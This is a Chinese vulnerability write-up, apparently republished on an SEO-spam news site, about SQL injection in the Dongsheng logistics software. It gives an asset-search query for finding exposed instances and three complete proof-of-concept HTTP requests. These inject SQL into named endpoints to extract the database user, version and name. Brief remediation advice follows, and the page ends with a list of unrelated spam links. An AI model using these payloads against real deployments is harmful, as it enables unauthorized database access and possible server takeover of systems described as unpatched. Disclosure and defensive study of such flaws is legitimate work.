当前位置: 首页 > news >正文

网站建设服务合同模板下载品牌推广内容

网站建设服务合同模板下载,品牌推广内容,中国造价工程建设管理协会网站,网站建设页头的设计0x01 产品简介 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。 0x02 漏洞概述 东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/Sav…

0x01 产品简介

 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。

0x02 漏洞概述

东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

微步资产测绘:app=东胜物流软件

0x04 漏洞复现 

PoC-1

GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1%27+and+user+%3E0%3B-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询当前用户

PoC-2 

GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort=&condition=123+IN+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2bCHAR(32)%2b(select+%40%40version)%2bCHAR(32)%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113))--%20&page=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询数据库版本

PoC-3

POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}

 查询当前数据库

0x05 修复建议

官方暂未修复该漏洞,请用户联系厂商修复漏洞:http://www.dongshengsoft.com/

部署Web应用防火墙,对数据库操作进行监控。

如非必要,禁止公网访问该系统。

 

http://www.wooajung.com/news/26456.html

相关文章:

  • 网站后台里有网页代码没网络营销的主要推广方式
  • 做网站最好的语言搜索引擎广告
  • 岳阳网站开发服务爱站网络挖掘词
  • 河南省城乡建设信息网谈谈你对seo概念的理解
  • 支付宝手机网站支付seo优化资源
  • 最新疫情消息全国厦门seo蜘蛛屯
  • 景观设计案例网站百度提交入口网站网址
  • 苗木 网站模板有没有免费推广平台
  • 公司英文网站建设2022年网络流行语
  • 网站开发优势宁波seo搜索引擎优化
  • com网站是用什么做的今日军事新闻报道
  • 聊城菜鸟网站建设公司网站优化内容
  • 济南网站制作案例百家号权重查询站长工具
  • facebook怎么推广网站优化算法
  • 0735郴州新网招聘seo排名赚挂机赚钱软件下载
  • 永嘉规划建设局网站南平seo
  • 北京上海网站建设公司北京seo优化费用
  • 网站建设制作流程一键免费生成网页的网站
  • 独立网站建设的步骤做推广哪个平台效果好
  • 用手机域名做网站搜索排行榜
  • 网站建设分几种类型无经验能做sem专员
  • 在招聘网站里做电话销售百度上海分公司
  • 东莞 网站制作百度竞价关键词优化
  • 网站域名主机空间区别重庆百度快速优化
  • win7 asp.net网站架设新产品怎样推广
  • 如何保护网站域名网站优化有哪些类型
  • 网站销售需要什么手续腾讯第三季度营收448亿元
  • 互联网产品设计网站挖掘爱站网
  • 做企业网站都需要注意哪点武汉新一轮疫情
  • 那个网站教宝妈做辅食文章优化软件